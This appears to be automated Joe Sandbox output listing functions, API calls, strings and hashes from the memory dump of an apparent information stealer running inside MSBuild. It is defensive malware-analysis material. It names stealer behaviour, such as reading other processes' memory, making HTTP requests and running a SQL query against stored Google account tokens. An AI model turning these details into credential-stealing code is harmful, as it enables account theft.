Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcat$File$AllocLocal$BinaryCryptFreeGlobalString_memset$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
String ID:
API String ID: 4109952398-0
Opcode ID: e9a4ec146eb9e2c466341b8cc226d98408b61403d0bb55f03ecd5558a0089f49
Instruction ID: 7b7bb4e5801e9de9fdd6adee9fdc4bc54d4e0b6c6ea2ffc621484fda9acbbecd
Opcode Fuzzy Hash: e9a4ec146eb9e2c466341b8cc226d98408b61403d0bb55f03ecd5558a0089f49
Instruction Fuzzy Hash: 26713FB1D4022D9FDF20DF61DC45BCA77BAAF88314F0405E6E508A3250EA369FA58F55

Function 00428C34 Relevance: 18.1, APIs: 12, Instructions: 95COMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00428C4D

Part of subcall function 00424192: Sleep.KERNEL32(00000000,?), ref: 004241BA

__calloc_crt.LIBCMT ref: 00428C71
_free.LIBCMT ref: 00428C7F
__calloc_crt.LIBCMT ref: 00428C8D
_free.LIBCMT ref: 00428C9D
_free.LIBCMT ref: 00428CA3
__copytlocinfo_nolock.LIBCMT ref: 00428CB2
__setlocale_nolock.LIBCMT ref: 00428CBF
_free.LIBCMT ref: 00428CD8
__setmbcp_nolock.LIBCMT ref: 00428CEA
_free.LIBCMT ref: 00428CF8
_free.LIBCMT ref: 00428D0C

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _free$__calloc_crt$Sleep__copytlocinfo_nolock__setlocale_nolock__setmbcp_nolock
String ID:
API String ID: 3833677464-0
Opcode ID: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction ID: 43a3aa265a383408f17471e0f34179b95454a98dc0d8d6604ebfa51982022fc1
Opcode Fuzzy Hash: 784abcef5afcd593a1ca4234ae08e44cf487d9407e5e4ef41eebf28f0038ada9
Instruction Fuzzy Hash: FB21043130A6309ADB21BF27F802A5EB7E4EF91754F60842FF48456251EF399850CA6C

Function 004168C6 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 79stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

Part of subcall function 00410519: lstrcpyA.KERNEL32(00000000,?,?,00401D07,?,00417731), ref: 00410538

Part of subcall function 00406963: InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 004069C5
Part of subcall function 00406963: StrCmpCA.SHLWAPI(?), ref: 004069DF
Part of subcall function 00406963: InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406A0E
Part of subcall function 00406963: HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00406A4D
Part of subcall function 00406963: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00406A7D
Part of subcall function 00406963: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406A88
Part of subcall function 00406963: HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00406AAC

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

StrCmpCA.SHLWAPI(?,ERROR), ref: 0041691A
lstrlenA.KERNEL32(?), ref: 00416925

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,?), ref: 0041693A
lstrlenA.KERNEL32(?), ref: 00416949
lstrlenA.KERNEL32(00000000), ref: 00416962

Strings

ERROR, xrefs: 0041696D
ERROR, xrefs: 00416977
ERROR, xrefs: 00416985
ERROR, xrefs: 0041697E
ERROR, xrefs: 00416914

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: HttpInternetlstrcpylstrlen$OpenRequest$AllocConnectInfoLocalOptionQuerySend
String ID: ERROR$ERROR$ERROR$ERROR$ERROR
API String ID: 4174444224-1526165396
Opcode ID: f30492f2b502414b17bb0b4adfbad9cabcc08a0cfc04f7276c5a86254eb9e12c
Instruction ID: f999f3c62c0b23b7ff363c4994354db6f8ba44fc0c3398813b2d55053c878ef3
Opcode Fuzzy Hash: f30492f2b502414b17bb0b4adfbad9cabcc08a0cfc04f7276c5a86254eb9e12c
Instruction Fuzzy Hash: 6021E571910204ABCB10BB75DC469DD77B8AF04308F11512BFC05E3191DB7DD9858F99

Function 0041BAA4 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,014124A0), ref: 0041BAD8
GetFileSize.KERNEL32(?,00000000), ref: 0041BB51
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BB6D
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BB81
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BB8A
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BB9A
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BBB8
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BBC8

Strings

, xrefs: 0041BB24

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: b93520a0e31e70c5fcafbd99113cd43e56b40bfe3ff6e632537e59c659fb1c6e
Instruction ID: cb892b0c559bbcf0e4207802013ae1cf0d61ca8ae93d0e0fc4d1a3101aeab4e7
Opcode Fuzzy Hash: b93520a0e31e70c5fcafbd99113cd43e56b40bfe3ff6e632537e59c659fb1c6e
Instruction Fuzzy Hash: E951F471D00218AFDB18DF99DC85AEEBBB9EF04304F10442AE511E6660D738AD85CF94

Function 0040DB7F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 109stringmemoryCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
GetProcessHeap.KERNEL32(00000008,-00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040DC21
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC28
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heaplstrlenstrchr$AllocProcessstrcpy_s
String ID: 0123456789ABCDEF
API String ID: 453150750-2554083253
Opcode ID: d7f8adf961633c923ded35c4b7c571d3f1c689bf508e1cbb2af2f09870105798
Instruction ID: 06d15f49a8eb9cf9066e179aa7ea4312028ee3a66f1e5adc80d081fb3659f8e0
Opcode Fuzzy Hash: d7f8adf961633c923ded35c4b7c571d3f1c689bf508e1cbb2af2f09870105798
Instruction Fuzzy Hash: 4A315D72D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 0041FA62 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041FA87

Part of subcall function 0041F622: Replicator::operator[].LIBCMT ref: 0041F6A5
Part of subcall function 0041F622: DName::operator+=.LIBCMT ref: 0041F6AD

DName::operator+.LIBCMT ref: 0041FAE0
DName::DName.LIBCMT ref: 0041FB38

Strings

,..., xrefs: 0041FACC, 0041FAD8
void, xrefs: 0041FB30
..., xrefs: 0041FB1B, 0041FB27
,<ellipsis>, xrefs: 0041FAD3
<ellipsis>, xrefs: 0041FB22

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction ID: 6b38829ecadea6215c8f6510e569e1b7c44c0c93244dcadd2c287e51603536b5
Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction Fuzzy Hash: 72217130601208AFCB11DF5CD4549AA7BB4EF4538AB54806AE845CB362E738E987CB4C

Function 004213FB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 00421405
DName::DName.LIBCMT ref: 00421411

Part of subcall function 0041F0DC: DName::doPchar.LIBCMT ref: 0041F10D

UnDecorator::getScopedName.LIBCMT ref: 00421450
DName::operator+=.LIBCMT ref: 0042145A
DName::operator+=.LIBCMT ref: 00421469
DName::operator+=.LIBCMT ref: 00421475
DName::operator+=.LIBCMT ref: 00421482

Strings

void, xrefs: 00421461

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction ID: 57a596a2ca760a273274528444675b4bf9d61aebdbb2dca40c7be891dda90938
Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction Fuzzy Hash: B811C671A00218AFD714FF68D856BE97B60AF20305F44409BE4069B2F2DB78DA86CB49

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 00413259 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 110stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 00413278
StrCmpCA.SHLWAPI(00000000,004367D8), ref: 004132B1
strtok_s.MSVCRT ref: 00413371

Strings

xA, xrefs: 0041326B, 0041326E

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: xA
API String ID: 3330995566-34346596
Opcode ID: b01048b4caaf2d781f6d9571aa0d0e9d3a4acf772d059dc07aa8dac5df416a25
Instruction ID: 735330a1d008a833b374886be4d947a81621c86a210c44f2da093846d2bcbd8c
Opcode Fuzzy Hash: b01048b4caaf2d781f6d9571aa0d0e9d3a4acf772d059dc07aa8dac5df416a25
Instruction Fuzzy Hash: 64319671E001099FCB14DF68CC85BAA77A8BB08717F51505BEC05DA191EB7CCB818B4C

Function 00409A0E Relevance: 12.2, APIs: 4, Strings: 4, Instructions: 223stringCOMMON

Download Yara Rule

APIs

Part of subcall function 004104E7: lstrcpyA.KERNEL32(00000000,00000000,?,0041718B,004366CD,?,?,?,?,0041869F), ref: 0041050D

lstrlenA.KERNEL32(?), ref: 00409BB2

Part of subcall function 00411E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00416931,?), ref: 00411E37

StrStrA.SHLWAPI(00000000,AccountId), ref: 00409BCF
lstrlenA.KERNEL32(?), ref: 00409C7E
lstrlenA.KERNEL32(?), ref: 00409C99

Part of subcall function 00410609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 0041061D
Part of subcall function 00410609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410645
Part of subcall function 00410609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,004171AC,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 00410650

Part of subcall function 004105C7: lstrcpyA.KERNEL32(00000000,?,0000000C,004176F9,004366DA), ref: 004105F5
Part of subcall function 004105C7: lstrcatA.KERNEL32(?,?), ref: 004105FF

Part of subcall function 0041058D: lstrcpyA.KERNEL32(00000000,?,00000000,004171CA,00436C18,00000000,004366CD,?,?,?,?,0041869F), ref: 004105BD

Strings

GoogleAccounts, xrefs: 00409A8E
AccountId, xrefs: 00409BC9
GoogleAccounts, xrefs: 00409A37
SELECT service, encrypted_token FROM token_service, xrefs: 00409B1F

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$lstrcat$AllocLocal
String ID: AccountId$GoogleAccounts$GoogleAccounts$SELECT service, encrypted_token FROM token_service
API String ID: 3306365304-1713091031
Opcode ID: 2fc3fedb7a38c60a1e3c3142767fcdf316f19d978f53f2269807e791b9c63d1c
Instruction ID: 1c65cc4d7803f8688ba0d0b6af71766e4abc47820e1b4d1122a48dc67a9a7b7f
Opcode Fuzzy Hash: 2fc3fedb7a38c60a1e3c3142767fcdf316f19d978f53f2269807e791b9c63d1c
Instruction Fuzzy Hash: 5C815171E40109ABCF01FFA5DE469DD77B5AF04309F511026F900B71E2DBB8AE898B98

Function 0041FB42 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041FB8B
DName::operator+.LIBCMT ref: 0041FB92
DName::DName.LIBCMT ref: 0041FBB4
DName::operator+.LIBCMT ref: 0041FBBB
DName::operator+.LIBCMT ref: 0041FBC2

Strings

throw(, xrefs: 0041FB83, 0041FBAC

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction ID: ba1955fdff4c252f9a606c57b8f1c9a48ddf06d7b75bf01b8414d0fb9b5eadfe
Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction Fuzzy Hash: E4015B34600209EFCF04DF64D856DED7BB5EF44749F50407AF50597292DA78EA8AC748

Function 0041210E Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 36stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(?,00000000,?,?,?,00413794,00000000,00000010), ref: 00412119
lstrcpynA.KERNEL32(C:\Users\user\Desktop\,?,00000000,?), ref: 00412132
lstrlenA.KERNEL32(?), ref: 00412144
wsprintfA.USER32 ref: 00412156

Strings

C:\Users\user\Desktop\, xrefs: 0041212C, 00412131
%s%s, xrefs: 00412150

Memory Dump Source

Source File: 00000008.00000002.3052243286.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000008.00000002.3052243286.0000000000463000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000467000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000046B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000048F000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000494000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004B3000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.00000000004D2000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.000000000056B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000656000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000008.00000002.3052243286.0000000000670000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s$C:\Users\user\Desktop\
API String ID: 1206339513-4107738187
Opcode ID: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction ID: 2b65b01ea0560ea7e18c8daf8da5e1637e4a778ce13f385dfd922e5b6f13eae1
Opcode Fuzzy Hash: e78d85b104e7b8f8ae18f25e6644af7b5d694852cb88d63dd502dd69edac9df2
Instruction Fuzzy Hash: 83F0E9322002157FDF091F99DC48D9B7FAEDF45666F000061F908D2211C6775F1586E5

Function 0040826D Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 128memoryCOMMON

Download Yara Rule

APIs

